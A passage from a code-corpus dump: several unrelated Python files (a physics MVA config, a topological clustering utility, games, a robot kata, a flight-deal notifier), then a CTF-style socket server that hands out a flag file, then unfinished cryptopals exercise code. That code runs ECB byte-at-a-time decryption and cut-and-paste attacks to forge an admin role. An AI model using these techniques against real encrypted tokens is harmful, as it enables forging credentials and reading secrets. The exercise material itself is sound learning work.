FWCore.ParameterSet.Config as cms\n\nfrom flashgg.Taggers.flashggTags_cff import UnpackedJetCollectionVInputTag, UnpackedPuppiJetCollectionVInputTag\n\n\n# legacy VBF MVA\nflashggVBFMVALegacy = cms.EDProducer('FlashggVBFMVALegacyProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedJetCollectionVInputTag,\n UseLegacyMVA = cms.untracked.bool(True),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/TMVA_dijet_sherpa_scalewt50_2evenb_powheg200_maxdPhi_oct9_Gradient.weights.xml\"),\n)\n\n# Legacy DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVALegacy = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag=cms.InputTag('flashggDiPhotons'),\n VBFMVAResultTag=cms.InputTag('flashggVBFMVALegacy'),\n MVAResultTag=cms.InputTag('flashggDiPhotonMVA'),\n UseLegacyMVA = cms.untracked.bool(True),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/TMVA_vbf_dijet_dipho_evenbkg_scaledwt50_maxdPhi_Gradient.weights.xml\"),\n)\n\n\n# new test VBF MVA with CHS Jets\nflashggVBFMVA = cms.EDProducer ('FlashggVBFMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedJetCollectionVInputTag,\n MVAMethod = cms.untracked.string(\"BDTG\"),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/test/MVATraining/weights/Flashgg_VBF_CHS_BDTG.weights.xml\"),\n)\n\n# new test DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVA = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag=cms.InputTag('flashggDiPhotons'),\n VBFMVAResultTag=cms.InputTag('flashggVBFMVA'),\n UseLegacyMVA = cms.untracked.bool(False),\n MVAResultTag=cms.InputTag('flashggDiPhotonMVA'),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/Flashgg_DiPhoDiJet_BDT.weights.xml\"),\n)\n\n\n\n# new VBF with PUPPI Jets\nflashggVBFMVAPUPPI = cms.EDProducer('FlashggVBFMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedPuppiJetCollectionVInputTag,\n MVAMethod = cms.untracked.string(\"BDTG\"),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/test/MVATraining/weights/Flashgg_VBF_PUPPI_BDTG.weights.xml\"),\n)\n\n\n# new test DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVAPUPPI = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n VBFMVAResultTag = cms.InputTag('flashggVBFMVAPUPPI'),\n UseLegacyMVA = cms.untracked.bool(False),\n MVAResultTag = cms.InputTag('flashggDiPhotonMVA'),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/Flashgg_DiPhoDiJet_BDT.weights.xml\"),\n)\n\n\n","sub_path":"Taggers/python/flashggVBFMVA_cff.py","file_name":"flashggVBFMVA_cff.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594744126","text":"import os\nimport sys\n# import scipy as sp\nfrom scipy.spatial import distance\n\nfrom sklearn.datasets import make_blobs, make_moons, make_circles\n\nimport numpy as np\n\nimport networkx as nx\nfrom itertools import product\n\nfrom itertools import combinations\n#from scipy.s_parent_idse import dok_matrix\nfrom operator import add\n\nfrom sklearn.neighbors import BallTree\n\n# ---- FUNCTIONS ----\n\n\ndef fit_kde_estimator(input_data: np.ndarray,\n bandwidth: 'np.linspace' = np.linspace(0.1, 1.0, 30),\n cross_validation: int = 2,\n verbose: bool = False,\n **kwargs) -> np.ndarray:\n '''\n [] DESCRIPTION []\n []\n <> _parent_idAMETERS <>\n <> X:np.ndarray = X numpy array of shape (n_samples, n_features)\n <>** cross_validation: int = is the number of cross validation to do during the fitting\n DEFAULT: 20\n <>** bandwidth_searchspace: np.linspace = np.linspace(0.01, 1.0, 30) is the linspace for bandwidth,\n DEFAULT: np.linspace(0.1, 1.0, 30)\n <>** verbose: bool = whether the algorithm should be verbose\n DEFAULT: False\n <>** other__parent_idams = the same as sklearn constructor for `KernelDensity`\n\n >< RETURNS><\n >< fitted sklearn KDE estimator\n ! NOTES !\n ! NOTE, we were following: https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/\n '''\n # ---- IMPORT -----------------------------------\n from sklearn.model_selection import GridSearchCV\n from sklearn.neighbors import KernelDensity\n\n # ---- CODE -------------------------------------\n _grid = GridSearchCV(KernelDensity(kernel='gaussian', **kwargs),\n {'bandwidth': bandwidth},\n cv=cross_validation)\n\n # FIT THE `input_data` TO PRODUCE BEST `KDE`\n _grid.fit(input_data)\n\n if verbose:\n print('BEST BANDWIDTH: {}'.format(_grid.best__parent_idams_))\n\n return _grid.best_estimator_\n\n\ndef fit_single_kde_estimator(input_data: np.ndarray, **kwargs):\n # ---- IMPORT -----------------------------------\n from sklearn.model_selection import GridSearchCV\n from sklearn.neighbors import KernelDensity\n\n # ---- CODE -------------------------------------\n _kde = KernelDensity(**kwargs)\n\n _kde.fit(input_data)\n\n return _kde\n\n\ndef evaluate_kde_estimator(fitted_estimator: 'sklearn `kde` estimator',\n input_data: np.ndarray)-> np.ndarray:\n '''\n <> _parent_idAMETERS <>\n <> fitted_estimator: sklearn `kde` estimator\n <> input_data: np.ndarray\n\n >< RETURNS ><\n >< np.ndarray = is exponentialized\n\n '''\n # ----- CODE --------------------------------------\n # since it is the `kde` estimator you must exponentialize it\n return np.exp(fitted_estimator.score_samples(input_data))\n\n\nclass Simplicial_complex():\n\n def __init__(self, simplices: list = []):\n '''\n ADD DOCSTRING\n '''\n # ----- CODE --------------------------------\n self.import_simplices(simplices=simplices)\n\n '''\n HELPER FUNCTIONS\n '''\n\n def import_simplices(self, simplices: list = []):\n '''\n ADD DOCSTRING\n '''\n # ----- CODE --------------------------------\n\n self._simplices = map(lambda simplex: tuple(sorted(simplex)), simplices)\n\n '''\n MAIN FUNCTIONS\n '''\n\n def faces(self):\n '''\n ADD DOCSTRING\n ! NOTE:\n the notion of `faces` is different from the notion of `boundary`\n\n '''\n # ----- CODE --------------------------------\n self._faceset = set()\n for simplex in self._simplices:\n _numnodes = len(simplex)\n\n for r in range(_numnodes, 0, -1):\n for face in combinations(simplex, r):\n self._faceset.add(face)\n\n return self._faceset\n\n def n_faces(self, dim: int):\n '''\n ADD DOCSTRING\n\n '''\n # ----- CODE --------------------------------\n return filter(lambda face: len(face) == dim+1, self.face_set)\n\n\nclass Vietoris_Rips_complex(Simplicial_complex):\n\n def __init__(self, points,\n epsilon,\n labels=None,\n distfcn=distance.euclidean):\n '''\n ADD DOCSTRING\n '''\n # ------ CODE --------------------------------------------------------\n self._pts = points\n self._labels = range(len(self._pts)) if labels == None or\\\n len(labels) != len(self._pts) else labels\n\n self._epsilon = epsilon\n self._distfcn = distfcn\n\n self.network = self.construct_network(\n self._pts, self._labels, self._epsilon, self._distfcn)\n\n #self.import_simplices(map(tuple, list(nx.find_cliques(self.network) )))\n self.import_simplices(map(tuple, nx.find_cliques(self.network)))\n\n '''\n HELPER FUNCTIONS\n '''\n\n def print_complex(self):\n print(list(nx.find_cliques(self.network)))\n\n def construct_network(self,\n points,\n labels,\n epsilon,\n distfcn):\n '''\n ADD DOCSTRING\n '''\n g = nx.Graph()\n g.add_nodes_from(labels)\n\n zips, spiz = zip(points, labels), zip(points, labels)\n\n for pair in product(zips, spiz):\n\n if pair[0][1] != pair[1][1]:\n dist = distfcn(pair[0][0], pair[1][0])\n if dist and dist < epsilon:\n g.add_edge(pair[0][1], pair[1][1])\n\n return g\n\n\nclass Union_find():\n '''\n this class implements the Union - find data structure\n\n\n '''\n # Initialization\n\n def __init__(self):\n\n self.weight_of_root = {}\n self._object_id_to_parent_id = {}\n\n self.id_to_object = {}\n self.objects_to_id = {}\n\n # Insert objects among the already existing ones\n def insert_objects(self, objects: \"iterable over `objects`\"):\n '''\n add docstring\n '''\n # ------- CODE ---------------------------\n for object in objects:\n _ = self.find(object)\n\n def is_object_in(self, object)->bool:\n\n return object in self.objects_to_id\n\n # Find a given object / build it if non-existing\n\n def find(self, object)->'object':\n '''\n\n <> object: must be hashable//lookable object\n\n >< ALWAYS RETURNS THE OBJECT\n this finds an object and returns the object if exists\n if object does not exist, it will put the object into the data structure\n '''\n # ------ CODE ------------------------------\n if not object in self.objects_to_id:\n\n # this will determine the unique ID for a new object\n # since the object was not among `object_to_id` set, it must be a new root\n _new_root_id = len(self.objects_to_id)\n self.objects_to_id[object] = _new_root_id\n\n # this means that the new root has only one (self) branch\n # in general the weight of the root of the tree measures how many\n # objects are attached to the root\n self.weight_of_root[_new_root_id] = 1\n\n # this creates the inverse dictionary, for given unique id you will get the object\n self.id_to_object[_new_root_id] = object\n\n # this creates the _parent_ident pointer\n # since this is a new root, roots _parent_ident is always root\n self._object_id_to_parent_id[_new_root_id] = _new_root_id\n\n return object\n\n # ok if the object is in the object dictionary\n # this basically looks for the root\n #\n # _list_of_nodes_id: stores the list of nodes as you are searching for root\n # you start with the current id\n _list_of_nodes_id = [self.objects_to_id[object]]\n\n # now look for parent id\n _parent_id = self._object_id_to_parent_id[_list_of_nodes_id[-1]]\n\n # this looks for biggest _parent_ident id\n while _parent_id != _list_of_nodes_id[-1]:\n _list_of_nodes_id += [_parent_id]\n\n _parent_id = self._object_id_to_parent_id[_parent_id]\n\n # it is the lazy type of union since it flattens up all the tree members\n # and all of them ave the same root\n #\n # this basically flattens the search tree\n for _node_id in _list_of_nodes_id:\n self._object_id_to_parent_id[_node_id] = _parent_id\n\n # this returns the root object\n return self.id_to_object[_parent_id]\n\n # Link two different objects in a same distinct set\n def union(self, object_1, object_2):\n '''\n add docstring\n '''\n\n # this looks for a roots of object_1 and object_2\n _root_1, _root_2 = self.find(object_1), self.find(object_2)\n\n # if roots are equal ... you are done\n # if the are different, you must to merge them\n # who is the root after merge depends on the weight of the root\n # the smaller root weight is merged into the bigger root weight\n if _root_1 != _root_2:\n\n # this looks for the root metadata, like root id`s and roots weights\n _root_1_id = self.objects_to_id[_root_1]\n _root_2_id = self.objects_to_id[_root_2]\n\n _root_weight_1 = self.weight_of_root[_root_1_id]\n _root_weight_2 = self.weight_of_root[_root_2_id]\n\n # just doing swap between roots if _root_weight_1 is smaller\n # SWAP\n if _root_weight_1 < _root_weight_2:\n _root_1, _root_2, _root_1_id, _root_2_id, _root_weight_1, _root_weight_2 =\\\n _root_2, _root_1, _root_2_id, _root_1_id, _root_weight_2, _root_weight_1\n\n # after swap we have guaranteed that whatever is stored in `root_1` is corerct biggest root\n self.weight_of_root[_root_1_id] = _root_weight_1 + _root_weight_2\n\n # we know that we can erase `_root_2` from the set that is reserved only for roots\n del(self.weight_of_root[_root_2_id])\n\n # and point _root_2_id to a new root == root_1_id\n self._object_id_to_parent_id[_root_2_id] = _root_1_id\n\n\nclass Tomato():\n\n def __init__(self, X: np.ndarray, density_estimation: str, **kwargs):\n '''\n <> PARAMETERS <>\n <> X: np.ndarray = data should be normalized to have values between <-1, 1> in all dimensions\n reason for that is that then the largest scale is\n <> density_estimation: str = is a restricted string {'kde', 'local_kde'}\n `kde` = is the global kde estimator\n `local_kde` = is knn based kde estimator, you need to provide `n_neighbors` parameter\n '''\n\n # ------ CODE ------------------------\n '''\n (I) YOU MUST FIT THE THE KDE DENSITIES\n '''\n #\n print('fitting densities')\n if density_estimation == 'kde_gauss_grid_search':\n _densities = evaluate_kde_estimator(fit_kde_estimator(\n X, cross_validation=kwargs.get('cross_validation', 2)), X)\n\n elif density_estimation == 'kde_tophat':\n _densities = evaluate_kde_estimator(fit_single_kde_estimator(X, kernel='tophat'), X)\n\n else:\n raise NotImplementedError\n\n '''\n (II) FIND THE ORDERING ON THE DATA, I.E. CREATE THE \\tilde{f} FUNCTION\n '''\n # `_data_store` stores a list of ordered data by the point density estimates in non-increasing fashion\n _data_store = sorted(zip(X.tolist(), _densities.tolist()),\n key=lambda x: -x[-1])\n\n '''\n (III) CREATE ORDERED DATA AS WELL AS THE `VR` COMPLEX\n '''\n\n # lets get just ordered densities, that will serve for quick lookup of pseudogradinets\n # as `tilde_f`\n self._tilde_f = np.array(list(map(lambda x: x[1], _data_store)))\n\n # extract only the ordered data\n self._ordered_data = np.array(list(map(lambda x: x[0], _data_store)))\n\n # FIX THIS ::: CREATE AN ALGORITHM THAT CAN FIND EPSILON AUTOMATICALLY\n # this can be done by looking for such an epsilon that ::: <- look into the paper\n #self.refit_vietoris_rips_graph(epsilon = kwargs.get('VR_EPSILON', 0.8))\n\n def fit_vietoris_rips_graph(self, epsilon: float):\n '''\n ADD DOCSTRING\n '''\n self._graph_type = 'vietoris_rips_complex'\n self._graph = Vietoris_Rips_complex(\n self._ordered_data, epsilon=epsilon,\n labels=list(range(self._ordered_data.shape[0])))\n\n def fit_knn_graph(self, n: int, **kwargs):\n '''\n ADD DOCSTRING\n '''\n self._graph_type = 'knn_complex'\n self._num_neighbors = n\n self._graph = BallTree(self._ordered_data, leaf_size=kwargs.get('leaf_size', 42))\n\n # actual\n\n def fit(self, tau: float = 1e-2)->'union find object':\n '''\n ADD DOCSTRING\n '''\n # ------ CODE ------------------------------\n # create UNION-FIND data sctructure\n _U = Union_find()\n\n # create the `g` vector == the pseudo gradient vector\n #_g_vector = np.full((len(self._tilde_f),), -1, np.int64)\n\n # create the `r` vector == the root vector\n #_r_vector = np.full((len(self._tilde_f), ), -1, np.int64)\n\n # at the beginning is every index its own root\n #_r_vector = np.array(list(range(len(self._tilde_f))))\n\n # this will be useful for plotting\n # well I will store (dens, True) = it means cluster was born\n # well I will store (dens, False) = it means that some density died\n _persistence_data = {}\n for idx in range(len(self._tilde_f)):\n\n '''\n (I) FIND NEIGHBORHOOD SET\n '''\n # returns the neighborhood of indices that have HIGHER densities than current idx :: I.E. PSEUDO-GRADIENTS\n # i.e. they have lower indices than the current index\n\n if self._graph_type == 'vietoris_rips_complex':\n print('using {} graph'.format(self._graph_type))\n _N = np.array(\n list(filter(lambda ind: ind < idx, self._vietoris_rips_graph.network[idx])))\n\n elif self._graph_type == 'knn_complex':\n _dist, _ind = self._graph.query(self._ordered_data[idx: idx + 1],\n k=self._num_neighbors)\n\n _N = np.array(list(filter(lambda ind: ind < idx, _ind[0])))\n else:\n raise ValueError('GRAPH NOT FOUND.')\n\n '''\n (II) CREATE UNION FIND // UPDATE UNION FIND\n '''\n # cluster is born\n\n if self._tilde_f[idx] not in _persistence_data:\n\n # the if statement should avoid zeroing something that was there before,\n # mathematically this should `almost` never happen, but because comp, it might\n _persistence_data[self._tilde_f[idx]] = 0.0\n\n if _N.size > 0:\n\n # if _N is not empty ::: then find the largest root and by neighbor gradients\n _pseudogradient = _N[np.argmax(self._tilde_f[_N])]\n\n # find root for `_pseudogradient`\n _parent = _U.find(_pseudogradient)\n\n # do `UNION` of idx and _parent\n _U.union(_parent, idx)\n\n # also means that `idx` density dies, at the level _tilde_f[idx]\n _persistence_data[self._tilde_f[idx]] = self._tilde_f[idx]\n\n for j in _N:\n # find root for j\n _parent_j = _U.find(j)\n\n # this is the condition when you decided to what root current node belongs\n _parents_root_densities = [self._tilde_f[_parent], self._tilde_f[_parent_j]]\n\n # what this means?\n # this means that parent densities are different and\n if _parent != _parent_j and min(_parents_root_densities) < self._tilde_f[idx] + tau:\n\n # only in this case conglomerate `parent_j` and `_parent`\n # means that `_parent` density dies\n _U.union(_parent_j, _parent)\n\n # this means that _parent density was killed at the level _tilde_f[idx]\n _persistence_data[self._tilde_f[_parent]] = self._tilde_f[idx]\n\n # update `_parent`\n _parent = _U.find(_parent_j)\n\n else:\n # if _N is empty :: then add `idx` into the union find data structure\n\n _U.insert_objects([idx])\n\n # also store the root for `idx` in root vector\n #_r_vector[idx] = idx\n\n return _U, _persistence_data\n\n\nclass ClusterGenerator:\n\n # Initialization\n # structure refers to the type of data to generate\n # n_samples refers to the amount of data to deal with\n # randomize is the random state for reproducibility\n def __init__(self, structure='blobs', n_samples=1500, randomize=42):\n\n self.structure = structure\n self.n_samples = n_samples\n self.randomize = randomize\n\n # Function aiming at generating samples\n def generate(self):\n\n if self.structure == 'anisotropy':\n\n x, y = make_blobs(n_samples=self.n_samples, random_state=self.randomize)\n vec = [[0.60834549, -0.63667341], [-0.40887718, 0.85253229]]\n return np.dot(x, vec), y\n\n elif self.structure == 'variances':\n\n std = [1.0, 2.5, 0.5]\n return make_blobs(n_samples=self.n_samples, cluster_std=std, random_state=self.randomize)\n\n elif self.structure == 'circles':\n\n return make_circles(n_samples=self.n_samples, factor=0.5, noise=0.05)\n\n elif self.structure == 'moons':\n\n return make_moons(n_samples=self.n_samples, noise=0.05)\n\n elif self.structure == 'random':\n\n return np.random.rand(self.n_samples, 2), None\n\n else:\n\n return make_blobs(n_samples=self.n_samples, random_state=self.randomize)\n","sub_path":"tomato_utils.py","file_name":"tomato_utils.py","file_ext":"py","file_size_in_byte":18237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337749923","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/3/5 9:56\n# @Author : zhao.chencheng\n# @Email : 907779487@qq.com\n# @File : game.py\n# @Software: PyCharm Community Edition\nimport random\ndef caishuzi():\n print(\"请给出一个区间范围\")\n while 1:\n a = input(\"最小值:\")\n b = input(\"最大值:\")\n if a == '' or b =='' :\n print(\"区间值 不能为空!\")\n else:\n if int(a)>int(b):\n a,b=b,a\n print(\"区间为:[%s-%s]\"%(a,b))\n break\n c = random.randint(int(a),int(b))\n print(\"标准值\",c,\"方便自己猜数!!!\")\n while 1:\n d = input(\"请输入猜测数字:\")\n if d == '' or d.isdigit() != True:\n print(\"输入值非数字!\")\n else:\n if int(d) < c:\n print(\"当前数字 %s 小于 标准值\"%d)\n elif int(d)>c:\n print(\"当前数字 %s 大于 标准值\"%d)\n elif int(d) == c:\n print(\"**恭喜你,你猜对了!**\")\n break\nif __name__ == '__main__':\n caishuzi()","sub_path":"python_study/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131804609","text":"import re\nfrom collections import namedtuple\n\nfrom World import World\n\n\nclass Robot(object):\n \"\"\"\n Base Robot class containing actions and parameters\n \"\"\"\n\n # compass directions as a class constant tuple preventing maleficent user to rewrite them\n directions = ('N', 'E', 'S', 'W')\n\n # default possible actions a robot can do. to extend these we demonstrate here a class initializer named\n # commands\n base_commands = ('L', 'R', 'F')\n\n def __init__(self, world_size, lost_robots, x=0, y=0, direction='N', commands=None):\n self.x = x\n self.y = y\n self.world_max_x = world_size[0]\n self.world_max_y = world_size[1]\n self.world = World(self.world_max_x, self.world_max_y, x, y)\n self.direction = direction\n self.commands = commands if commands is not None else self.base_commands\n # initialize the first robot move with the default position if no value has been provided\n self.robot_moves = [(0, self.x, self.y, self._direction, '')] # stack-like record of robot moves\n self.lost_robots = lost_robots\n\n @property\n def direction(self):\n return self.direction\n\n @direction.setter\n def direction(self, value):\n if value not in self.directions:\n raise ValueError(\"direction you provided {} is not one of N, E, S, W\".format(value))\n self._direction = value\n\n def turn(self, direction, move_id):\n \"\"\"\n Turn 90 degrees clockwise or anti clockwise and update the robot direction\n :return: update_robot_moves call with the new robot \n :param: move_id \n \"\"\"\n\n # get last move from self.robot_moves\n last_move = self.robot_moves[-1]\n current_direction = self.directions.index(last_move[3])\n\n # compute the new direction depending if we have a positive or negative index and where in\n # the directions we find ourselves\n\n new_direction = current_direction + direction\n\n if new_direction > 3:\n new_direction = self.directions[0]\n elif new_direction < 0:\n new_direction = self.directions[3]\n else:\n new_direction = self.directions[new_direction]\n\n self.update_robot_moves((move_id, last_move[1], last_move[2], new_direction, ''))\n\n def update_robot_moves(self, coordinates):\n \"\"\"\n Append a new move to the self.robot_moves. Maybe an overkill\n TODO:: rethink if this is required or bind it to an already existent method\n \"\"\"\n\n return self.robot_moves.append(coordinates)\n\n def is_moved_allowed(self):\n \"\"\"\n Check if the move is within allowed boundaries.\n :return True if move is allowed\n :return False if move will fall out of worlds boundaries\n \"\"\"\n # get last move from self.robot_moves\n idx, last_x, last_y, last_dir, last_status = self.robot_moves[-1]\n\n if ((last_dir == 'N' and last_y < self.world_max_y) or\n (last_dir == 'S' and last_y - 1 >= 0)) or \\\n ((last_dir == 'E' and last_x < self.world_max_x) or\n (last_dir == 'W' and last_x - 1 >= 0)):\n return True\n else:\n return False\n\n def move(self, step, move_id: int):\n \"\"\"\n Move one grid unit in the given direction. Check if the move is allowed before the\n adding it to the robot moves\n :return: update_robot_moves if a move is allowed\n :return: break if robot is lost\n \"\"\"\n idx, last_x, last_y, last_dir, last_status = self.robot_moves[-1]\n\n if self.is_moved_allowed():\n if last_dir == 'N':\n return self.robot_moves.append((move_id, last_x, last_y + 1, last_dir, ''))\n elif last_dir == 'S':\n return self.robot_moves.append((move_id, last_x, last_y - 1, last_dir, ''))\n elif last_dir == 'E':\n return self.robot_moves.append((move_id, last_x + 1, last_y, last_dir, ''))\n else:\n return self.robot_moves.append((move_id, last_x - 1, last_y, last_dir, ''))\n else:\n return self.robot_moves.append((idx, last_x, last_y, last_dir, 'LOST'))\n\n def engage(self, moves):\n \"\"\"\n Main function to move the robot\n :return: latest position after completing the moves in a string with format: \"x y direction\"\n :return: if lost the return string has the format: \"x y direction LOST\"\n \"\"\"\n\n if not isinstance(moves, str):\n raise ValueError(\"robot moves must be of type string\")\n\n if len(moves) > 100:\n raise ValueError(\"robot moves must not exceed 100 steps\")\n\n # make a local copy of moves and make sure we have all letters in uppercase\n moves = moves.upper()\n\n # check if there is anything else than the instructions provided in the moves string\n reg = re.compile('^[L|R|F]+$')\n if reg.match(moves):\n for move in enumerate(moves):\n i, m = move\n if m == 'L':\n self.turn(-1, i + 1)\n elif m == 'R':\n self.turn(1, i + 1)\n else:\n last_move_id, last_move_x, last_move_y, last_move_direction, last_move_status = self.robot_moves[-1]\n if last_move_status != 'LOST':\n self.move(1, i + 1)\n\n # check if another robot has been lost on this move. if so return the last position as current\n # for the next move\n elif last_move_status == 'LOST' and \\\n str.join('', [x for x in self.robot_moves[-1]]) in self.lost_robots:\n\n self.robot_moves.append(\n (last_move_id + 1, last_move_x, last_move_y, last_move_direction, 'LOST'))\n else:\n break\n\n # return last position after competing the moves\n last_move_id, last_move_x, last_move_y, last_move_direction, last_move_status = self.robot_moves[-1]\n\n return f\"{last_move_x} {last_move_y} {last_move_direction} {last_move_status}\"\n else:\n raise ValueError(\"a sequence of move actions can only contain {}\".format(self.commands))\n\n def __repr__(self):\n \"\"\"\n class string conversion\n :return: human readable representation of the form\n Robot(x=0, y=0, direction=N, commands=('L', 'R', 'F')) for\n default class creation\n \"\"\"\n return (f'{self.__class__.__name__}('\n f'x={self.x}, y={self.y}, direction={self._direction}, commands={self.commands})')\n","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391769238","text":"from data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\nfrom datetime import datetime, timedelta\n\n\n# This file will need to use the DataManager,FlightSearch, FlightData,\n# NotificationManager classes to achieve the program requirements.\n\ndata_manager = DataManager()\nflight_search = FlightSearch()\nsheet_data = data_manager.get_sheet_data()\nnotification_manager = NotificationManager()\n\nORIGIN_CITY_IATA = \"LON\"\n\nfor row in sheet_data:\n if row['iataCode'] == \"\":\n city = row['city']\n iataCode = flight_search.get_iatacode(city)\n row['iataCode'] = iataCode\n\ndata_manager.response_data = sheet_data\ndata_manager.update_sheet_data()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_today = datetime.now() + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n ORIGIN_CITY_IATA,\n destination[\"iataCode\"],\n from_time=tomorrow,\n to_time=six_month_from_today\n )\n\n if flight.price < destination[\"lowestPrice\"]:\n notification_manager.send_email(\n message=f\"Low price alert! Only ${flight.price} to \"\n f\"fly from {flight.origin_city}-{flight.origin_airport} to \"\n f\"{flight.destination_city}-{flight.destination_airport}, \"\n f\"from {flight.out_date} to {flight.return_date}.\"\n )\n","sub_path":"Day39FlightDealFinder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"437675476","text":"# _*_ coding: UTF-8 _*_\nimport os\nimport sys\nimport time\nimport socket\nimport signal\nimport random\n\nsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\ndef Time():\n return time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))\n\ndef server(skt):\n line = skt.recv(1024)\n print(line.decode())\n try:\n if line.decode() == \"isme\\n\":\n skt.send((\"isme right\\n\").encode())\n f = open(\"/root/flag.txt\",\"r\")\n flag = f.read()\n skt.send(str(flag).encode())\n except:\n skt.send((\"you send me a wrong str\").encode())\n\n\nskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\nskt.bind(('0.0.0.0', 1024))\nskt.listen(10)\n\nwhile True:\n clnt, addr = skt.accept()\n \n if(os.fork() == 0):\n clnt.send((\"Accepted connection from %s:%d\\n\" % (addr[0], addr[1])).encode())\n if random.randint(1,2)==1:\n server(clnt)\n os._exit(0)\n else:\n print(\"rand=2\")\n sys.exit(0)\n","sub_path":"Docker191016/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601963046","text":"#!/usr/bin/python3\n\nimport Crypto.Cipher.AES\nimport base64 as b64\nimport random\nimport caty\nfrom string import printable\n\n\ndef main():\n #c12()\n c13()\n\n\ndef encryptProfile(payload):\n p = profile_for(payload)\n cipher_bytes\n return cipher_bytes\n\n\ndef c13():\n key = randomKey()\n \n # hacker controls input for profile_for()\n keysize = len(key)\n # generate to sets of blocks:\n # set A: \n # A1 = email=jackeroo@e\n # A2 = adminPPPPPPPPPPP\n # A3 = mail.comxxxxxxxx\n # A4 = xxx&uid=10&role=\n # A5 = \n # where P corresponds to the respective padding \n A1 = \"jackeroo@e\"\n A2 = pkcs7padding(b\"admin\").decode(\"utf-8\")\n A3 = \"\"\n A4 = \"mail.comxxxxxxxx\"\n A5 = \"xxx\"\n \n '''\n email = \"jackeroo@jmp.com\"\n prefix = \"email=\"\n role = \"admin\"\n role += \"a\" * (len(role) % keysize) \n L1 = len(prefix + email)\n P1 = \"b\" * (L1 % keysize)\n '''\n payload = A1 + A2 + A3 + A4 + A5\n print(\">>> payload: \", payload.encode(\"utf-8\")) \n p = profile_for(payload)\n print(\">>> profile: \", p.encode(\"utf-8\"))\n #parse_request_string(p)\n \n cipher_bytes = aes_ecb_encrypt(p.encode('utf-8'), key)\n \n print(\">>> cipher: \", cipher_bytes)\n # hacker can see and modify the cipher_bytes before they are decrypted and parsed\n print(\">>> -----\") \n malicious_bytes = hack(cipher_bytes, keysize=16)\n print(\">>> malicious bytes\", malicious_bytes)\n malicious_msg_bytes = aes_ecb_decrypt(malicious_bytes, key)\n print(\">>> decrypted malicious msg: \", malicious_msg_bytes)\n print(parse_request_string(malicious_msg_bytes.decode('utf-8')))\n\ndef genSetA():\n return None\n \n\ndef hack(cipher_bytes, keysize):\n blocks = []\n for i in range(len(cipher_bytes) // keysize):\n blocks.append(bytes([b for b in cipher_bytes[i*keysize:(i+1)*keysize]]))\n print(\">>> cipher blocks\")\n for b in blocks:\n print(b)\n blocks[-1]=blocks[1]\n blocks[1] = b\"\"\n new_cipher_bytes = b\"\".join(b for b in blocks) \n return new_cipher_bytes\n\n\ndef c12():\n print(\">>> challenge 12 >>>\")\n oracleKeysize = findKeysize(oracle)\n payload = b\"A\" * oracleKeysize * 5\n oraclesize = len(oracle(b\"\"))\n \n # use a multiple of the keysize as estimated total size \n ciphersize = oraclesize + (oraclesize % oracleKeysize)\n print(\">>> keysize: \", oracleKeysize)\n print(\">>> ciphersize: \", ciphersize)\n message = b\"\"\n if isECBmode(oracle(payload)):\n print(\">>> oracle uses ECB mode >>>\")\n print(\">>> try to crack oracle secret >>>\")\n message = singleByteCrackECB(oracle, oracleKeysize, ciphersize)\n \n print(\">>> message >>>\\n{}\".format(message.decode('utf-8')) )\n\n\ndef getNextByte(oracleKeysize, currentMsg, oracle):\n lengthToUse = (oracleKeysize - (1 + len(currentMsg))) % oracleKeysize\n prefix = b\"A\" * lengthToUse\n crackingLength = lengthToUse + len(currentMsg) + 1\n realCiphertext = oracle(prefix)\n #print(prefix,currentMsg)\n cipher_map = {}\n for c in printable:\n fakeCiphertext = oracle(prefix + currentMsg + c.encode('utf-8'))\n cipher_map.update({fakeCiphertext[:crackingLength]:c.encode('utf-8')}) \n try:\n return cipher_map[realCiphertext[:crackingLength]] \n except:\n # if there is no match, then return '.' byte. No match is probably due to padding.\n return b\".\"\n\n\ndef singleByteCrackECB(oracle, oracleKeysize, ciphersize):\n msg_bytes = []\n currentMessage = b\"\"\n for i in range(ciphersize):\n msg_bytes = getNextByte(oracleKeysize, currentMessage, oracle)\n 